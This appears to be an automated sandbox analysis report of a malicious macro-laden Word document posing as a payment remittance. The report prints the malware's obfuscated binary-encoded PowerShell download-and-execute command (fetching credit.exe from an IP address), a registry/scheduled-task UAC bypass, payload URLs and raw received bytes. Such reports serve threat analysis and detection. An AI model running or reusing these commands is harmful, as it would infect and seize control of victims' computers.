Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 30, 2021, 11:46 a.m. | July 30, 2021, 11:48 a.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\JPM_Payment_Remittance_505693.docm
1620-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
2200-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
3024 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
3068 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2108
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
1568
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
zya3ig.sn.files.1drv.com |
CNAME
sn-files.fe.1drv.com
CNAME
l-0003.l-msedge.net
|
13.107.42.12 |
twistednerd.dvrlists.com | 185.189.112.27 | |
onedrive.live.com |
CNAME
l-0004.l-msedge.net
|
13.107.42.13 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49166 -> 192.227.158.111:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected |
TCP 192.168.56.102:49169 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49171 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49170 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49169 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | CN=onedrive.com | 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de |
TLSv1 192.168.56.102:49171 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLSv1 192.168.56.102:49170 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://192.227.158.111/credit.exe |
request | GET http://192.227.158.111/credit.exe |
request | GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg |
request | GET https://zya3ig.sn.files.1drv.com/y4mhGDkKmL3VDLSUrEWHAJjnel-AVhbdeVNYyQnBqeWWrlxrQZ9NszEAsvT8XGLPe7mkz9QTC2UI2gLMghScHsnFP_Z6_KMpHHOIsKBYLdy8Z_oB67tIlMC6eqSbrKMSaRvkdLdJNSecdujzF4iBhESi-AinVSWep0qzarT4IY-QFmPWqsXK9v3smoVL9-Ky_SUCQSiGojuKkheE7LkfMcRgw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1 |
request | GET https://zya3ig.sn.files.1drv.com/y4mOTz_QAR6NiYt2v34fuSPi5mluFwXvFkGg8tgtdufNHC3Zp9FIYVKG-COsmBXTAwBxjc8xosZ0KnX7YbZwmx2gL8VpE8j5-03OKW0BG2tczyDzTjZtpuri4UXT7gVUL5_4LtiWlB8bzeQv8EGyVBirb0QKQzgVoopEqx_2Y5-ilTcGCMR2XMNsrjj0y-XdrvdZ12IIfBEs2MBrH5lxUUseg/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1 |
file | C:\Users\test22\AppData\Local\Temp\~$M_Payment_Remittance_505693.docm |
file | C:\Users\Public\UKO.bat |
file | C:\Users\test22\AppData\Local\Temp\credit.exe |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\Public\nest.bat |
file | C:\Users\Public\Libraries\Boplulw\Boplulw.exe |
file | C:\Users\Public\Trast.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | Powershell $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
file | C:\Users\test22\AppData\Local\Temp\credit.exe |
Data received | ;Xuï;Xu_;x ×+P@AL$è5üÿÿ|$ t3L$T$Åèoúÿÿ|$ uL$T$D$èüÿÿ$3Òé L$×Ãèîûÿÿ|$ t4L$T$Åè(úÿÿ|$ TÿÿÿL$T$D$è4üÿÿ$3ÒëRh;ÝuB;x;$Å×è×üÿÿ$8 t.$@B$@)Bx uèùÿÿë$3ÒÄ]_^[ÃSÄèÙÿ? á Àÿÿ$Ðâ ÀÿÿT$D$;$v_ËT$+$$èýÿÿL$Ó¸üL è]ùÿÿ\$ ÛtL$T$ÃènûÿÿD$D$D$D$|$ tT$¸üL è©ùÿÿë3ÀÄ[ÃÀUìQ3ÒUh @ dÿ2d"hÌL è¼÷ÿÿ=ML t hÌL è±÷ÿÿ¸ìL èCøÿÿ¸üL è9øÿÿ¸(L è/øÿÿhø j è_÷ÿÿ£$L =$L t@¸ $L 3ÉLô@= uìÇEüL EüUüPEüUüEü£L ÆÄL 3ÀZYYdh'@ =ML t hÌL è!÷ÿÿÃéc ëå ÄL Y]ÃUìÄø=ÄL è 3ÀUh$@ dÿ0d =ML t hÌL èÔöÿÿÆÄL ¡$L Pè¢öÿÿ3À£$L ¡ìL Eøëh j Eø@PèöÿÿEø Eø¸ìL ;EøuÛ¸ìL è÷ÿÿ¸üL è÷ÿÿ¸(L è ÷ÿÿ¡äL Eü}ü t!Eü £äL EüPè-öÿÿ¡äL Eü}ü uß3ÀZYYdh+@ =ML t hÌL è'öÿÿhÌL è%öÿÿÃé_ ëÛYY]ÃSÄø;L u PL P$Pú N;$u ÒyÂÁú¡$L 3ÉLôëK ÒyÂÁú $L $\ô D$$T$D$$Pë D$$T$D$$PYZ[Ã@ SQÌ(L ëR;Âr S;Ârº(L ;ußÇÈL 3ÀZ[ÃÀSQÊé$ú|$Ç ÑèÚ Z[Ãú|ÊÉ $Z[Ãÿ´L Ðêâüÿÿê¸L èû ÃÀú|ÊÀèÊÿÿÿÃú| ÊÉ Â þÃSVQÐêÊá ù t ÇÈL Úãüÿÿ+ÃÈ3÷Âþÿÿÿt ÇÈL öt)Ðêr+Æ$$;pt ÇÈL $è0þÿÿÞÃZ^[ÃSVQØ3ö© t%üÿÿðبu$$èþýÿÿ$@ðØ#þÆZ^[Ã@ SVWUÄôòè3ÛÅèhþÿÿD$|$ D$xÇT$BÐ.+Ñúð+õÅ+Çø}D$Õ+PÖÌÇèûÿÿëÌÖêEèûÿÿ<$ ÿt:×+ÕÅè=þÿÿT$RL$QÇD$;Ðv .+Ðè{þÿÿÔD$èüôÿÿ³ÃÄ]_^[ÃSVÄôÚð4$$X$ÃèXû và ÀyÀÁø$L TôT$|$ u#$L $Lô$$P$$é D$ D$$T$P$ |
Data received |